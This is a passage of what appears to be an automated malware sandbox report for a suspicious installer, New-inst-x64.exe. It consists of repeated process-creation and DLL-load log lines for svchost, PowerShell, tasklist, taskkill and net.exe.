      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\Desktop\New-inst-x64.exe Section loaded: dbghelp.dll
      Source: C:\Users\user\Desktop\New-inst-x64.exe Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\New-inst-x64.exe Section loaded: userenv.dll
      Source: C:\Users\user\Desktop\New-inst-x64.exe Section loaded: winmm.dll
      Source: C:\Users\user\Desktop\New-inst-x64.exe Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\New-inst-x64.exe Section loaded: powrprof.dll
      Source: C:\Users\user\Desktop\New-inst-x64.exe Section loaded: umpdc.dll
      Source: C:\Users\user\Desktop\New-inst-x64.exe Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\New-inst-x64.exe Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\New-inst-x64.exe Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\New-inst-x64.exe Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\New-inst-x64.exe Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\New-inst-x64.exe Section loaded: napinsp.dll
      Source: C:\Users\user\Desktop\New-inst-x64.exe Section loaded: pnrpnsp.dll
      Source: C:\Users\user\Desktop\New-inst-x64.exe Section loaded: wshbth.dll
      Source: C:\Users\user\Desktop\New-inst-x64.exe Section loaded: nlaapi.dll
      Source: C:\Users\user\Desktop\New-inst-x64.exe Section loaded: dnsapi.dll
      Source: C:\Users\user\Desktop\New-inst-x64.exe Section loaded: winrnr.dll
      Source: C:\Users\user\Desktop\New-inst-x64.exe Section loaded: apphelp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
      Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
